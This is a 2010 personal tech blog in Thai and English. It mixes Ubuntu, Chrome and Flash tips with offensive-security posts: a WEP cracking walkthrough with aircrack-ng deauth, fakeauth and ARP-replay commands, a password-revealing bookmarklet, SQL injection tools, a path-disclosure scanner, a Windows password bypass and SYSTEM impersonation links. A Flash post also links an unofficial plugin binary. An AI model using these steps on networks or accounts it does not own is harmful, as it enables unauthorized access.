Pages

9/30/2010

User scripts on Chrome

ถ้าใครเคยใ้ช้ firefox มา อาจจะรู้จักกับ plug-in ที่ชื่อว่า GreaseMonkey ซึ่งเป็นปลั๊กอินที่สามารถทำให้ผู้ใช้งานสามารถเลือกใส่ javascript เพิ่มเข้าไป เพื่อให้firefox แก้ไขข้อมูล/ทำงานพิเศษ ในหน้าเวปต่างๆได้

เพิ่งรู้ว่า Google Chrome ก็มีเหมือนกันกับการใช้ user scripts นี่
เห็นว่าเริ่มมาตั้งแต่ Google Chrome version 4.0 แล้ว แต่วิธีการเริ่มใช้งานดูยากลำบากมาก

ตอนนีก็ version 6.0 แล้ว ก็ควรที่จะพัฒนาให้มันใช้งานได้แล้วใช่มะ? (คิดว่านะ)

แล้วจริงๆ ก็คือ ใช้งานง่ายมากเลย
ด้วยการไปหา userscript มา ที่เป็นนามสกุลชนิด  ".user.js" ลากเข้ามาใส่ใน Chrome เลย
หรือไม่ก็ใช้วิธีการ เปิดหาเอาจากเวป www.userscripts.org
เพื่อหา script ที่เราต้องการ แล้วกด Install
Chrome จะถามว่าจะ install เลยใช่มั๊ย..  แล้วก็แป๊ปๆ ก็กลายเป็น plugin ให้เราใช้งาน

Example: ใช้ Google Images direct link
เพื่อให้เวลาค้นหาภาพด้วย google images
แล้วกกดคลิ๊กที่ภาพ จะเปิดหน้าใหม่เป็นรูปนั้นโดยตรง  
ไม่ใช่แบบปกติของgoogleที่จะเปิดเป็นเวปที่เก็บภาพนั้นไว้

เริ่ม ด้วยการหาเจอว่า user script นั้นอยู่ที่
http://userscripts.org/scripts/show/78355


เมื่อกด install แล้ว Chrome จะขึ้นเป็นแบบนี้

ก็ตอบ continue ไปว่าตกลงติดตั้ง
และ install

นี่คือหน้าตาที่เสร็จแล้ว

คราวนี้มาลองดูผลลัพธ์กันดีกว่า...

อันนี้เป็นสามหน้ามาเปรียบเทียบกัน
จากซ้ายไปขวาคือ  
หน้าผลลัพธ์การค้นหาคำว่า ubuntu,  ต่อมาคือเมื่อเวลากดเปิดแบบธรรมดาโดยไม่ใช้สคริป, และหน้าขวาสุดคือกดเปิดด้วยสคริป

สะดวกและง่ายกว่ากันเยอะเลย

Similarity between Code Recognition

Just listened to a talk to day and feel like many concepts are the same thing.

Aspect Oriented Programming : cutting a complete program into different parts based on Aspect that provided while coding. Make it's easier to understand and debug on specific point of code.

Feature Location : a project from Sukanya and Hye Jung Choi, that trying to monitor code changes while a developer debug the code which is issued from bug tracker. And we can say that the specific bug report covers this part of the code. When we got a part of code labeled by description from bug tracker (or manually assigned), that part of code is easily to understand.

Agile's refactoring and Test-Driven Development :  Test-Driven Development(TDD) is writing test first. Then implementing the code later. After awhile (maybe after integration, or completing code), a developer re-factors the code to make it easier to read without breaking test suite.
If we can capture the test cases matching with the code/functions that they use to test, that's the cognitive knowledge of the code.  That means we can understand the code just from reading "test case" first, then see what classes are related, then we can focus our attention to the classes easily.

Quite the same? These concepts are trying to help developers understand the code by mapping "aspect"/"description"/"test case" to a part of source code.
They just use different approaches.

inspath - Path Disclosure Finder

A tool that uses local source tree to make requests to the url and
search for path inclusion error messages. It's ever a common problem
in PHP web applications that we're hating to see for ever. We hope
this tool triggers no path disclosure flaws any more. See our article
about path disclosure.
http://yehg.net/lab/pr0js/view.php/path_disclosure_vulnerability.txt

The inspath takes
* -d or --dir argument as source directory (of application)
* -u or --url arguement as the target base URL (like http://victim.com)
* -t or --threads argument as the number of threads concurrently to run (default is 10)

Example
ruby inspath.rb -d /sources/phpmyadmin -u http://localhost/phpmyadmin -t 20
ruby inspath.rb -d c:/sources/phpmyadmin -u http://localhost/phpmyadmin -t 20

Example Result
I, [2010-09-22 18:00:08 pid:#9284]  INFO -- : [*] http://localhost/mambo/includes/core.classes.php
[html_source]
Fatal error:  Class 'mosDBTable' not found in /home/victim/public_html/mambo/includes/core.classes.php on line 857
[/html_source]

I, [2010-09-22 18:00:20 pid:#9284]  INFO -- : [*] http://localhost/mambo/administrator/popups/modulewindow.php
[html_source]
Fatal error:  Call to undefined function mosGetParam() in /home/victim/public_html/mambo/administrator/popups/modulewindow.php on line 16
[/html_source]


Download (via SVN)

svn checkout http://inspathx.googlecode.com/svn/trunk/ inspathx-read-only 
REF: http://seclists.org/fulldisclosure/2010/Sep/375

Ubuntu: new system command for today


Check mainboard status


ptantiku@ptantiku-desktop:~$ acpi


Battery 0: Full, 100%
ptantiku@ptantiku-desktop:~$ acpi -V Battery 0: Full, 100% Battery 0: design capacity 5200 mAh, last full capacity 4089 mAh = 78% Adapter 0: on-line Thermal 0: ok, 34.5 degrees C Thermal 0: trip point 0 switches to mode critical at temperature 89.0 degrees C Cooling 0: LCD 0 of 7 Cooling 1: Processor 0 of 10 Cooling 2: Processor 0 of 10





Check CPU info






ptantiku@ptantiku-desktop:~$ cat /proc/cpuinfo
processor : 0 vendor_id : GenuineIntel cpu family : 6 model  : 23 model name : Intel(R) Core(TM)2 Duo CPU     T8300  @ 2.40GHz stepping : 6 cpu MHz  : 800.000 cache size : 3072 KB ...
Checking CPU Speed + Available speed (change cpu0 to cpu1 for another core)


ptantiku@ptantiku-desktop:~$ sudo cat /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_cur_freq 
2400000
ptantiku@ptantiku-desktop:~$ sudo cat /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_min_freq 
800000
ptantiku@ptantiku-desktop:~$ sudo cat /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq 
2401000
ptantiku@ptantiku-desktop:~$ sudo cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_frequencies 
2401000 2400000 2000000 1600000 1200000 800000
ptantiku@ptantiku-desktop:~$ sudo cat /sys/devices/system/cpu/cpu0/cpufreq/ondemand/up_threshold 
95
meaning?  my current CPU runs at 800MHz which is minimum speed it can go.
if CPU load reaches 95%, it'll scale up to max speed.


Checking GPU Temp:


ptantiku@ptantiku-desktop:~$ nvidia-smi -a


==============NVSMI LOG==============
Timestamp   : Thu Sep 30 00:48:47 2010 GPU 0:  Product Name  : GeForce 8400M GS  PCI ID   : 42710de  Temperature  : 57 C


Ubuntu: additional configurations today

Flash::

sudo su
mkdir /etc/adobe
echo "OverrideGPUValidation=true" > /etc/adobe/mms.cfg
http://ubuntuforums.org/showthread.php?t=1259102&page=23


try to add this to "/etc/rc.local" just before "end" line
If you have more cores then you must do this for every core ( cpu1, cpu2, cpu3, ...).


Quote:
Originally Posted by 00ber n00b View Post
So, since I have a dual core amd processor it should read...

Code:
echo 1 > /sys/devices/system/cpu/cpu0/cpufreq/ondemand/ignore_nice_load
echo 50 > /sys/devices/system/cpu/cpu0/cpufreq/ondemand/up_threshold
echo 1 > /sys/devices/system/cpu/cpu1/cpufreq/ondemand/ignore_nice_load
echo 50 > /sys/devices/system/cpu/cpu1/cpufreq/ondemand/up_threshold
And exactly what does this do?
"ignore_nice_load=1" - ignore processes which has "nice" positive value when counting how much processor is loaded with work.
For example BOINC client ( any other background programs and system daemon ) without this would bash processor to 100% of usage but with "nice=19" it uses processor only when it is free from other task so why to speedup processor for it since it not need it and not consume processor for itself.

"up_treshold=50" - state precentage of processor ocupation above which kernel frequency manager will speedup core to higher frequency.
So if you have processor which could scale his speed from 1GHz to 2GHz when it's counted usage is below 50% stays in 1GHz mode but when it's usage past 50% then it speedup to 2GHz.

My processor will scale on values: 1000MHz, 1600MHz, 1800MHz and 22000MHz.
When it's usage past 50% it speedup to 2200MHz, but at 2200MHz mode when it's usage is below 50% then it slow down to 1800MHz. If it still below 50% then slow down to 1600MHz and so on. That's "OnDemand" kernel processor sheduler.
There's others which make's things differently.

I changed the up_threshold to 60 though.


Just found out that global plugin directory doesn't have new flash lib, so I did this:
sudo cp /opt/google/chrome/plugins/libflashplayer.so /usr/lib/firefox-addons/plugins/

9/29/2010

Legend of the Guardians + เรื่องแปลกๆ ในโรงหนัง

วันนี้เพื่อนๆ ชวนไปดูหนังเรื่อง Legend of the Guardians: The Owls of Ga'Hoole 
เป็นหนังที่ฉายเป็น 3D ซะด้วย
ไอ้เราก็ไม่ได้ดู 3D นานละ  ประกอบกับเพื่อนๆกลุ่มนี้เพิ่งจะได้มาเจอกันอีกครั้ง หลังSummer
ก็เลย(คล้ายๆ)จะปฏิเสธไม่ได้ซะละ


หนังเรื่องนี้ก็แนวๆ  ตามหานกฮูกในตำนานที่เก่งกาจ จนกลายเป็นเรื่องเล่ามาถึงฮูกหนุ่มคนนึง
แต่ด้วยความจัดพลัดจับผลู  เรื่องก็เกิดขึ้นเมื่อ  เหล่าฮูกกลุ่มนึงที่ตั้งตัวเป็นกลุ่ม "The pure one"จะยึดครองแผ่นดิน
และยังเกณฑ์ฮูกทั้งหลายที่จับได้มาล้างสมอง แถมสะสมอาวุธลับร้ายแรงด้วย
แล้วฮูกพระเอก กับพี่ชาย ก็โดนจับไป
พี่ชายกลายเป็นเข้าข้างกับฝ่ายร้าย   แต่ฮูกพระเอกหนีออกมาได้กับนางเอกเพื่อตามหาฮูกในตำนาน ที่เป็นตำนานจริงหรือเรื่องโกหก ก็ไม่รู้ .....  ติดตามต่อเองในโรงละกัน


มาเล่าความแปลกต่อ..
โรงหนังที่นี่ไม่มีคนมาเฝ้าหน้าประตูโรงหนังแฮะ
คือซื้อตั๋วหนังเสร็จ  แล้วถ้าผ่านด่านแรกหน้าสุดของประตูลงไปได้ (ที่ๆเขาฉีกตั๋ว)
แล้วก็ไม่มีใครเฝ้าหน้าโรงอีกแล้วเพื่อเช็คว่าจะมีตั๋วหรือไม่มีตั๋ว
แปลกดีจริง .. 
อย่างงี้ คนที่ดูหนังเรื่องนึงเสร็จ ก็เข้าไปดูอีกเรื่องได้สิ
หรือว่าคนที่ซื้อตั๋วถูก  แต่อยากดู 3D ที่ตั๋วแพงกว่าก็เดินเข้าได้สบายๆเลย
เหอๆๆ  ดีที่เราไม่ได้ทำ ...


แปลกอย่างที่สอง..
พอก่อนหนังจากเริ่ม  กำลังนั่งดูหนังตัวอย่างกับกินขนมอยู่ดีๆ
อยู่ๆมีไอ้มืดมาจากไหนไม่รู้ ใส่เสื้อบาสเบอร์32  มันนั่งไกลๆ ก่อน(แต่แถวเดียวกัน)
เสร็จแล้วก็ค่อยเขยิบมาใกล้ขึ้น  ใกล้ขึ้น
เสร็จแล้ว มันก็เริ่มคุยกับเราแฮะ (ในโรงเนี่ยนะ)
มันบอกว่า ...  ขอตั๋วเราให้มันได้มั๊ย...เดี๋ยวจะเอากลับมาคืน...
เราก็บอกว่า... เอาไปทำไม?
มันบอกต่อว่า ... เอาไปให้แฟนมันเข้ามาได้
เราก็.... ???  อ้าวแล้วตั๋วมันก็ฉีกแล้ว จะเอาไปใช้ได้ไง???
มันบอกว่า...  ก็แค่เอาไปลองใช้  เหมือนกับว่าคนๆนี้ผ่านเข้ามาแล้ว  แล้วออกไปข้างนอกแล้วกลับเข้ามาใหม่ไง
เราก็.... ??? (คิดในใจ... ได้เหรอฟะ มันง่ายงั้นเลยเหรอ...) 
และด้วยความเป็นคนไม่อยากมีเรื่อง (ค่อนข้างดูน่ากลัว) เราก็เลยยอมให้ไป


เสร็จแล้วมันก็เดินออกจากแถวที่นั่งไป   ทำท่าจะเดินไปที่ประตูทางออกจากโรงหนัง
แป๊ปๆ เลี้ยวกลับมาอีกแถวนึง ที่ถัดออกไป 3 แถวจากเรา
แล้วก็คุยอะไรกับไอ้พวกข้างหน้านั่นอีกสองคนก็ไม่รู้  ... 
เราก็.......อ้าวเวนกำ ....... 
ความเป็นไปได้คือ   
หนึ่ง... ไอ้พวกข้างหน้านั่นอีกสองคนน่ะพวกมัน... แล้วทำไมมันไม่เอาตั๋วจากไอ้พวกนั้นฟะ.. ตูโดนหลอกแล้ว????
สอง .. ถ้าไอ้พวกข้างหน้าไม่ใช่พวกมัน .. แล้วมันก็ไปขอไอ้พวกข้างหน้าเหมือนมาขอเราเนี่ยนะ... แฟนมันมีกี่คนฟะเนี่ย???


เก็บความสงสัยไว้ในใจ มาระบายต่อในบล๊อค  เซ็ง!!!!

9/28/2010

Aircrack Setting Up

Download Aircrack from:
http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz

Extracting tar
$ tar xzvf aircrack-ng-1.1.tar.gz
$ cd aircrack-ng-1.1
$ make
...

if error "implicit declaration of function ‘HMAC’"
install libssl-dev
$ sudo apt-get install libssl-dev

$ sudo make install

[*] Run 'airodump-ng-oui-update' as root (or with sudo) to install or update Airodump-ng OUI file (Internet connection required).

$ sudo airodump-ng-oui-update

[*] Downloading IEEE OUI file...
[*] Parsing OUI file...
[*] Airodump-ng OUI file successfully updated




$ sudo airdriver-ng detect
Found "Intel Pro Wireless 4965 A/B/G/N" device: (iwl4965)
0c:00.0 Network controller: Intel Corporation PRO/Wireless 4965 AG or AGN [Kedron] Network Connection (rev 61)

PCI devices (generic detection):
0c:00.0 Network controller: Intel Corporation PRO/Wireless 4965 AG or AGN [Kedron] Network Connection (rev 61)

$ sudo airdriver-ng supported

Following stacks are supported:
0. IEEE80211
1. IEEE80211 Softmac
2. mac80211

Following drivers are supported:
0. ACX100/111 - IEEE80211
1. ADMtek 8211 - IEEE80211
2. ADMtek 8211 - mac80211
3. Atmel at76c50x - IEEE80211
4. Atmel at76_usb - IEEE80211
5. Broadcom 4300 - IEEE80211
6. Broadcom 4300 - mac80211
7. Cisco/Aironet 802.11 - IEEE80211 Softmac
8. HostAP - IEEE80211
9. Intel Pro Wireless 2100 B - IEEE80211
10. Intel Pro Wireless 2200 (B/G)/2915 (A/B/G) - IEEE80211
11. Intel Pro Wireless 3945 A/B/G - IEEE80211
12. Intel Pro Wireless 3945 A/B/G - raw mode
13. Intel Pro Wireless 3945 A/B/G - mac80211
14. Intel Pro Wireless 4965 A/B/G/N - mac80211
15. Lucent Hermes and Prism II - IEEE80211
16. Madwifi[-ng] - IEEE80211
17. Prism54 - IEEE80211
18. Prism54 - mac80211
19. Ralink rt2400 (legacy)
20. Ralink rt2400 (rt2x00) - IEEE80211
21. Ralink rt2400 (rt2x00) - mac80211
22. Ralink rt2500 (legacy)
23. Ralink rt2500 (rt2x00) - IEEE80211
24. Ralink rt2500 (rt2x00) - mac80211
25. Ralink rt2570 (legacy)
26. Ralink rt2570 (rt2x00) - IEEE80211
27. Ralink rt2570 (rt2x00) - mac80211
28. Ralink rt61 (legacy)
29. Ralink rt61 (rt2x00) - IEEE80211
30. Ralink rt61 (rt2x00) - mac80211
31. Ralink rt73 (legacy)
32. Ralink rt73 (rt2x00) - IEEE80211
33. Ralink rt73 (rt2x00) - mac80211
34. Realtek rtl8180 - custom
35. Realtek rtl8187 - custom
36. Realtek rtl8187 - mac80211
37. WLAN-NG - IEEE80211
38. Xircom Creditcard Netwave - IEEE80211
39. ZyDAS 1201 - IEEE80211 Softmac
40. ZyDAS 1211 - IEEE80211 Softmac
41. ZyDAS 1211rw - IEEE80211 Softmac
42. ZyDAS 1211rw - mac80211
43. NDIS Wrapper


New linux tool for Dell users

It's called "libsmbios2"
This tools provides BIOS information + editing directly from command line.

Installation:

sudo apt-get install libsmbios2


Available Commands:


smbios-get-ut-data
smbios-lcd-brightness
smbios-passwd
smbios-rbu-bios-update
smbios-state-byte-ctl
smbios-sys-info
smbios-sys-info-lite
smbios-token-ctl
smbios-upflag-ctl
smbios-wakeup-ctl
smbios-wireless-ctl


and they need "sudo" for issuing the commands.

e.g.


ptantiku@ptantiku-desktop:~$ sudo smbios-sys-info
Libsmbios version:      2.2.13
Product Name:           XPS M1330
Vendor:                 Dell Inc.
BIOS Version:           A14
System ID:              0xXXXX
Service Tag:            XXXXXX
Express Service Code:   XXXXXXXXXXXX
Asset Tag:             
Property Ownership Tag:  


or think like
ptantiku@ptantiku-desktop:~$ sudo smbios-wireless-ctl --info
Libsmbios version : 2.2.13
smbios-wireless-ctl version : 2.2.13
Wireless Info:
Hardware switch supported
Hardware switch is On
WiFi Locator supported
Wireless Keyboard not supported
NVRAM Size: 256 bytes
NVRAM format version: 1

Radio Status for WLAN:
WLAN enabled at boot
WLAN supported
WLAN enabled
WLAN installed
WLAN controlled by wireless switch at boot
WLAN runtime switch control currently enabled
Status Code: 0

Radio Status for Bluetooth:
Bluetooth enabled at boot
Bluetooth supported
Bluetooth enabled
Bluetooth installed
Bluetooth controlled by wireless switch at boot
Bluetooth runtime switch control currently enabled
Status Code: 0

Radio Status for WWAN:
WWAN enabled at boot
WWAN supported
WWAN disabled
WWAN not installed
WWAN controlled by wireless switch at boot
WWAN runtime switch control currently enabled
Status Code: 2

Wireless Switch Configuration
WLAN switch control: on
Bluetooth switch control: on
WWAN switch control: on
switch config: not locked
WiFi locator: enabled
WiFi Locator config: not locked

9/27/2010

Reveal Asterisk Password using Javascript!

I got it from here
http://www.pentestit.com/2010/09/24/short-post-reveal-passwords-asterisks-javascript

javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j< F.length; ++j) { f = F[j]; for (i=0; i< f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();


While opening the page with asterisk password,  copy and paste this code on URL bar, it'll search and reveal every password boxes (that use name="password")

SQL Vulnerability Tools

1. SQLBruter :: A python script that brute forcing data out from database (MSSQL,ORACLE) ,
when co-operate with other tool to dump malicious payload
read more : http://www.darknet.org.uk/2007/06/sqlbrute-sql-injection-brute-force-tool/
watch more :
http://www.youtube.com/watch?v=j6IP1DJcfB0


2. Havij :: A Windows tool to finding exploits from webpages using blind sql injection.
Read More : http://www.darknet.org.uk/2010/09/havij-advanced-automated-sql-injection-tool/
Watch More :

Hide Evolution into Tray

Ubuntu comes with a tray panel that contains both socialization activities into one tray icon.


(p.s. The feature doesn't come with gmail option by default, I installed "gmail-notify" pythong script to make it works)

It works fine if you want to use chatting, broadcasting, and email application.
I found 2 flaws: one all the applications (chat/broadcast/email) won't start automatically when I starts Ubuntu, and only the email app that when I close it, it's gone and need me to open the app again.

First, to solve the first problem it's really easy
just add all the programs to Startup app, it'll open all the programs for you.
- Chatting App : "empathy"
- Broadcasting App : "gwibber"
- Email App : "evolution"

edited: for Empathy and Gwibber, they can be set to be able to start at login.
@Empathy: Edit --> Preferences --> Mark at "Automatically start on startup"
@Gwibber: Edit --> Preferences --> Mark at "Start service at login"

And where to add it is at System --> Preferences --> Startup Applications


Second Problem is...
I don't have option that I can minimize it back into a tray. There are only quit application (either hit "X" button at corner of window, or File->Quit (Ctrl+Q)) , or minimize it into Taskbar.

It's pretty annoying me because I don't like to see many windows on my screen or my taskbar, especially software that should be running in background.

So.... "ALLTRAY" is a life saver.
just install the application and any window that I want it to be a tray icon, it'll go to tray icon.
to install it.
$ sudo apt-get install alltray

And Now, How to use it.

The application will be in Application ---> Accessories ---> Alltray

It'll show up with screen like this, and mouse cursor will change. (Alltray window over Evolution window)

Then, just simply click at the "Evolution" window. Then, Alltray window will disappear and now we can click minimize the Evolution window and It'll go to tray like this:

Getting new tray icon... (Evolution is running in minimize mode)

To make it permanently,
Let's make Alltray handles the process since it starts up.
So, I edited the startup command (in Preferences --> Startup Applications) for Evolution to
alltray -l evolution

That's it!

Flash Player Crashes on Ubuntu 64bit Linux

I'm using Ubuntu Lucid, and everytimes I ran Youtube for couple of pages, my web-browser crashed.
For now, I'm using both Chrome 6.0.472.63 and Firefox 3.6.10.
Both died, by Flash Player consuming CPU utilization.

I tried to search for some solutions, and finally found the cause.
It causes from some bug in Flash Player 32bit, but since Adobe just wrapped the 32bit version to 64 bit version, then the bug is still there.

Way to solve it?
Adobe just launched some testing flash plugin for those who owns 64bit OS.
it's called  "Adobe Flash Plugin Square". http://labs.adobe.com/technologies/flashplayer10/
It's still in a preview release, but i guess i'll try it out.

Some important features of "Square" flash player :
 - 64 bit native support
 - IE9 hardware rendering support

I'm not a big fan of IE (and I'm using Linux btw). So, I couldn't test it on IE 9.



I did some installation of the "Square" flash on both my Chrome and Firefox.
Here are the instructions:

  1. Download the tar file from http://download.macromedia.com/pub/labs/flashplayer10/flashplayer_square_p1_64bit_linux_091510.tar.gz  (link on Sep 27, 2010)
  2. Extract the tar file using command
  3. Now we'll see the file "libflashplayer.so" which is the library that we want.
  4. Copy it to our browser's plugin folder
    1. [Optional] I renamed the original plugin file before I copied the new one to these locations.
    2. For Google Chrome
      1. Plugin directory is at  /opt/google/chrome/plugins

      2. So, I did the command



        $ cp libflashplayer.so /opt/google/chrome/plugins
    3. For Firefox
      1. Plugin directory is at  /home//.mozilla/plugins
      2. So, I did this command



        $ cp libflashplayer.so  /home/ptantiku/.mozilla/plugins
  5. Restart web browser
  6. Now it should be working.


UPDATE:::
It has been working fine with most of the applications, e.g. all animations, stock market trading program, etc.
But it doesn't work with Facebook's photo uploader.

So,... I remove every library (*.so), and re-install package "flashplugin-installer".
It will install the library named "npwrapper.libflashplayer.so" in
/usr/lib/flashplugin-installer/libflashplayer.so (link)
/var/lib/flashplugin-installer/npwrapper.libflashplayer.so

and it put the link named /usr/lib/firefox-addons/plugins/libflashplayer.so
for firefox.

Then, I copy the link to make Chrome works
/opt/google/chrome/plugins/libflashplayer.so

UPDATE on May 29, 2011:::
 - I'm using Backtrack 5 right now, and the flash still have the problem
 - flashplugin-nonfree doesn't work well enough
 - I just copied libflashplayer.so from my previous OS installation (Mint 10) to use in this case
 - to download it follow this link http://www.mediafire.com/file/kux2eh12ovmfppv/libflashplayer.so
 - and place it in :
      Firefox :   /usr/lib/mozilla/plugins/
      Chromium: /usr/lib/chromium-browser/plugins/

9/21/2010

Remove Windows Password without any tricky tool

From http://kb.ucla.edu/articles/manually-resetting-windows-account-password
and
http://pubs.logicalexpressions.com/pub0009/lpmarticle.asp?id=305

using Windows installation CD
Do a repair install of Windows from your installation media, and after the initial reboot and “Installing Windows” screen, wait for Installing Devices and then hit Shift-F10 , then type in nusrmgr.cpl and hit enter to access the User Accounts in the Control Panel.

Default user named "SYSTEM"

เมื่อเร็วๆนี้  เพิ่งรู้ว่าเครื่อง Windows ตั้งแต่ XP ขึ้นมา มี built-in user ชื่อว่า SYSTEM ด้วย
user นี้ อาจจะใช้ชื่ออื่นๆได้เช่น
NT AUTHORITY\SYSTEM
LOCALSYSTEM

ที่น่าตกใจกว่าก็คือ...   SYSTEM เนี่ย ดันมีสิทธิ์ เหนือกว่า Administrators ด้วยล่ะ
ขัดแย้งกับความเข้าใจปกติของเราเลยที่คาดว่า Administrator จะมีสิทธิ์สูงสุด

เลยต้องหาข้อมูลซะหน่อยว่า อะไรเป็นอะไร

ไปค้นข้อมูลมา จนเจอ 2 Links นี้
http://technet.microsoft.com/en-us/library/dd277461.aspx
http://technet.microsoft.com/en-us/library/bb726980.aspx
ซึ่งเป็นข้อมูลของ Windows 2000
ปรากฎว่า...

Windows เนี่ย เวลาลงมาแล้วจะมี built-in users ให้มาเลย 3 ประเภท
แต่ Administrator เป็นแค่ pre-defined user ,  หมายความว่ามันสามารถแก้ไขเปลี่ยนแปลง ทำอะไรก็ได้
ในขณะที่ System ดันอยู่กลุ่มที่สาม คือ Implicit user,  ไม่สามารถแก้ไขเปลี่ยนแปลงอะไรได้เลย  มันคือ special user!

System:: 
Account used by the operating system to run services, utilities, and device drivers. This account has unlimited power and access to resources that even Administrators are denied, such as the Registry's SAM.
This account is used by Windows 2000 to execute security services such as TSF protection functions that are beyond the control of authorized administrators.


LocalSystem is a pseudo-account for running system processes and handling system-level tasks. The account is available on the local system only. You can't change the settings for the LocalSystem account with the user administration tools. Users can't log on to a computer with this account.


หลังจากดูๆแล้ว  สิทธิ์ของ Systemเนี่ย เหนือกว่า Administrator ตั้งหลายอย่าง
Act as part of the operating system ::: Allows a process to authenticate as any user and gain access to resources as any user.
Create a token object ::: Allows processes to create token objects that can be used to gain access to local resources.
Log on as a service ::: Allows a security principal to log on as a service, as a way of establishing a security context. The LocalSystem account always retains the right to log on as a service. Any service that runs under a separate account must be granted this right. By default, this right is not granted to anyone.



ความจริงยังไม่ทันต้องดูบรรทัดอื่นเลย  
เจอสิทธิ์แรก ที่ให้ ทำทุกอย่างได้เหมือนกับเป็นส่วนหนึ่งของ OS ก็แย่แล้ว
สามารถเข้าถึง process โดยการใช้ชื่อใครก็ได้   เข้าถึง resource โดยเป็นใครก็ได้  (แน่นอน รวมถึงเป็น Admin ด้วย)
ดังนั้น ถ้าจะเข้าถึง SAM (ไฟล์ที่เอาไว้เก็บ hash ของ password)ได้  ก็คงจะไม่แปลกอะไร


----------------------------

ถึงจะบอกว่า ผู้ใช้ไม่สามารถจะ Login ด้วย Account "SYSTEM" นี้ได้
แต่ก็ มีคนหาวิธีทำได้จนได้
http://security.fnal.gov/cookbook/LocalSystem.html


และด้วยความสามารถที่ System จะสามารถกลายเป็นใครก็ได้ในระบบ
เราก็ impersonate กลายเป็นผู้ใช้ระบบคนอื่นๆได้อีก
http://carnal0wnage.blogspot.com/2008/05/token-passing-with-incognito.html
http://carnal0wnage.blogspot.com/2008/05/token-passing-with-incognito-part-2.html
http://carnal0wnage.blogspot.com/2009/04/more-on-working-with-incognito-and.html

9/14/2010

Update Metasploit in BackTrack4

เพิ่งลง BackTrack4 R1  ใน Virtual Box
พอมาลอง msfconsole  ปรากฎว่ามันบอกว่า คุณไม่ได้อัพเดตฐานข้อมูล exploit มาตั้ง 40 วันแล้ว
อ่านวิธีอัพเดตที่ wiki ..blah blah blah


เข้าไปอ่านแวปๆ คร่าวๆ เหมือนกับว่า ถ้าเกิดเราลง Metasploit แบบปกติเนี่ย มันจะมี ไฟล์ชื่อ
msfupdate
มาให้รันถึงที่

แต่ว่า Backtrack มันลงมาให้ยังไงนี่สิ  ไม่มีไอ้ไฟล์นี้

ลองค้นๆ แล้วก็ปรากฎว่าไปเจออยู่ที่
/pentest/exploits/framework3/external/installer-linux/scripts/msfupdate      <<< fullpath of the file
เลยจัดการ copy มาลงที่
/pentest/exploits/framework3/        <<< directory
ซะเลย

พอสั่งรัน  ดันรันไม่ได้อีก เหมือนจะ error นิดๆหน่อยๆ
เลยไปลบบรรทัดนี้ ในไฟล์นั้นออก
cd $BASE/msf3

แล้วก็สั่งรันจาก directory ที่ไฟล์อยู่ ก็เรียบร้อย updated
root@bt:/pentest/exploits/framework3# ./msfupdate
เสร็จแล้ว ก็จะได้ Metasploit โฉมใหม่

9/12/2010

วิธี hack wireless ที่ป้องกันด้วยระบบ WEP

หลังจากอ่านมาหลายที่  สุดท้ายโปรแกรมหลักๆ ที่ใช้ในการ จัดการกับเรื่องนี้ มีอยู่สี่ตัว คือ
airmon-ng, airodump-ng, aircrack-ng, aireplay-ng

โดยแต่ละตัว ทำหน้าที่คือ

  • airmon-ng       ทำการเปิดระบบให้wireless card เราอยู่ใน mode ที่ monitor traffic ได้
  • airodump-ng   ดักจับ packet ที่วิ่งอยู่ในอากาศ  โดยเราสามารถฟิลเตอร์ได้ว่าจะเอาเฉพาะที่มาจากwireless ตัวไหน ช่องไหน
  • aircrack-ng      รับข้อมูลที่ได้มาจากการ dump เพื่อมาแกะหา pass key ที่จะใช้ในการเข้าไปใช้ wireless
  • aireplay-ng      ไว้สำหรับเล่นกับตัวwireless access point เพื่อทำเร่งให้มี traffic เยอะๆ จะได้ดักจับ และแกะ pass key ได้ง่ายขึ้น


หลักการคร่าวๆ คือ

  1. เปิดระบบให้ wireless card ทำตัวแบบรับ traffic ได้
  2. หา และดักจับ traffic ในอากาศ เฉพาะตัว wireless APที่ต้องการเข้าใช้ และบันทึกลงไฟล์
  3. [Optional]  เพื่อความรวดเร็ว อาจจะใช้การจำลองส่งข้อมูลเข้าไปที่ wireless AP เพื่อสร้างให้เกิด traffic เพิ่มขึ้นมาได้  จะได้ดักจับได้จำนวนมากๆ
  4. นำไฟล์ที่เก็บ packet ต่างๆไว้ มา crack  เพื่อหา pass key ของ wireless AP ตัวนั้น


คำสั่งต่างๆ แบบเรียงลำดับการใช้งาน
(* wireless intf == ชื่ออุปกรณ์wireless เช่น  wlan0, mon0)
เปิดการใช้งาน Wireless Interface
airmon-ng           ; เพื่อเช็คว่า wireless interface ชื่ออะไร
airmon-ng stop [wireless intf]         ; หยุดการทำงานก่อน
airmon-ng start [wireless intf]        ; เริ่มการทำงานใหม่ ในโหมด monitor
[ ถ้าใช้ได้แล้ว  airmon-ng อีกครั้ง จะเห็นว่ามีิิอุปกรณ์wirelessใหม่ขึ้นมาชื่อ mon0 ซึ่งเราจะเอาไปใช้ต่อไป]

เริ่มค้นหาและดักจับข้อมูล
airodump-ng mon0       ; เช็คดูว่า มี wireless AP อะไรอยู่บ้าง
เลือก AP ที่ต้องการ โดยจำ channel, bssid ของมันไว้ แล้วกด Ctrl+C เพื่อหยุดคำสั่งนี้
airodump-ng -w wep -c [channel number] --bssid [bssid number]  mon0      ;เพื่อเริ่ม dump ข้อมูล traffic ที่วิ่งเข้า/วิ่งออก wireless AP ตัวนั้น แล้วเก็บไว้ในไฟล์    wep-**.cap 
ปล่อย airodump-ng รันไว้เรื่อยๆ ก่อน

[optional] กระตุ้นให้ traffic มากขึ้น
aireplay-ng -0 -a [bssid] -c [a client's mac] mon0   ;เพื่อหลอกว่าเราจะlogout แต่ความจริงแค่เอา ACK เท่านั้น (สามารถใช้เก็บค่า handshaking key ใน wpa ได้ด้วย)
aireplay-ng -1 0 -a [bssid] mon0     ;เพื่อปลอมว่าเราจะพยายาม login เข้าไปใช้wireless ตัวนี้ (fakeauth)
aireplay-ng -3 -b [bssid] mon0      ; เพื่อโจมตีด้วยการสร้าง Arp-request ไปเรื่อยๆเพื่อให้เกิดข้อมูลวิ่งเข้าวิ่งออก (arpreplay)
